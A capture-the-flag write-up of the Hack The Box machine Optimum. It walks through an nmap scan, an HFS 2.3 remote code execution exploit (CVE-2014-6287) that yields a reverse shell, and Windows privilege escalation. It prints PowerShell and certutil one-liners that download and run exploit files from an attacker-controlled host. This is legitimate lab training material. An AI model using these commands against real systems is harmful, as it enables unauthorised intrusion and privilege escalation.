by Table of Contents
About Optimum
In this post, I’m writing a write-up for the machine Optimum from Hack The Box. Hack The Box is an online platform to train your ethical hacking skills and penetration testing skills.
Optimum is a ‘Easy’ rated box. It is a retired box. Grabbing and submitting the user.txt flag, your points will be raised by 15, and submitting the root flag you points will be raised by 30
Foothold
We see an interesting port HTTP (80) running apache (httpd). The version for http-server-header: HFS 2.3. The version is HttpFileServer httpd 2.3 for apache. This version has a vulnerability for CVE2014-6287l
User
After exploiting this vulnerability I was able to establish a reverse shell as user kostas
Root
The root part of this machine was very interesting, we use searchsploit to look for a local privesc technique on windows. Usually I would use linpeas, but in a box this simple, I didn’t see it as necessary. I did systeminfo on the box to find out the version and name of the OS, and I found a privesc technique on exploitdb that suites this OS (39719.ps1). After getting it on the target machine using powershell in an executable area for kostas, I was able to use this to get root
Machine Info
Recon
nmap -sC -sV -oA ./nmap/10.10.10.8 10.10.10.8
Starting Nmap 7.80 ( https://nmap.org ) at 2020-07-03 14:24 UTC
Nmap scan report for 10.10.10.8
Host is up (0.12s latency).
Not shown: 65534 filtered ports
PORT STATE SERVICE VERSION
80/tcp open http HttpFileServer httpd 2.3
|_http-server-header: HFS 2.3
|_http-title: HFS /
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
Service detection performed. Please report any incorrect results at https://
nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 201.59 seconds
As we can see here it is an http web page, lets pay it a visit.
Enumeration
I visited the web page http://10.10.10.8:80 and found a search bar that looks like it is maybe vulnerable to SQL injection or XSS
Due to the overemphasis on the HttpFileServer 2.3 Portion, I am pretty certain that this is trying to tell us something.. that something is wrong. With a little bit of research on exploits for this, I came up with the following
Intrusion
After cloning a github repo containing CVE 2014-6287 we modify the python script to suit our IP address and port
CVE 2014-6287
The findMacroMarker function in parserLib.pas in Rejetto HTTP File Server (aks HFS or HttpFileServer) 2.3x before 2.3c allows remote attackers to execute arbitrary programs via a %00 (nullbyte) sequence in a search action.
Part of the CVE Readme//instructions includes serving nc.exe on port 80 before
setting up a listener. Lets do that with a locate nc.exe and cp to our directory
and serve it
Now all thats left to do is run the script
Voila! We have a reverse shell.
Privilege Escalation
When we try to cd into admin, it gives us denied access.
As we can see, we cannot cd into administrator, we need to privesc.
Lets run a systeminfo cmd to see what we are working with.
So after looking up a local privesc exploit on exploit db, I found a local windows
Enum
We can use this if we can get this on the windows machine. After searching in
Program Files, we do find out that the machine has powershell and that we can
run the ps1 file for a privesc exploit
So how do we do this? Think about wget in linux. In order to do this in
powershell, we need to serve a simplehttp server with the ps1 file allocated to it.
Then we can use powershell to get from our IP, and into a directory on the box
with full rwx priv.
10.10.14.19 (is our IP)
powershell -c “(new-object System.Net.WebClient).DownloadFile(‘http://
10.10.14.19:8080/39719.ps1′, ‘c:\Users\Public\Downloads\39719.exe’)”
OR
IEX(New-Object Net.WebClient).downloadString(‘http://
10.10.14.19:8080/39719.ps1′)
These two commands in powershell will allow us to grab our ps1 file as long as it
is being hosted on our web server
Now run the executable. The executable doesn’t work, so we need to do a bit
more work. Lets look for more exploits using
windows-exploit-suggester.py
The github repo:
git clone https://github.com/GDSSecurity/Windows-Exploit-Suggester.git
Going through the readme, we must run
pip install xlrd –upgrade
./windows-exploit-suggester.py –update
Now we must copy the results of systeminfo and paste it in a file on our local
machine for us to use the exploit suggester, linpeas also does this
Further Enum
We get some vulnerabilities, but this one looks interesting considering we are
on a windows 8.x system.
https://www.exploit-db.com/exploits/41020 This is one that comes up, at the top
we can just download the exe rather than gcc it
Now lets serve this on a simple http server and get it using:
powershell -c “(new-object System.Net.WebClient).DownloadFile(‘http://
10.10.14.19:8080/41020.exe’, ‘c:\Users\Public\41020.exe’)”
you could also use certutil to do this- certutil -urlcache -f http://ip/41020.exe
(assuming we are serving on port 80)
Lets serve on the python server so our exe can be reached
Own The Machine
Many thanks again for reading!
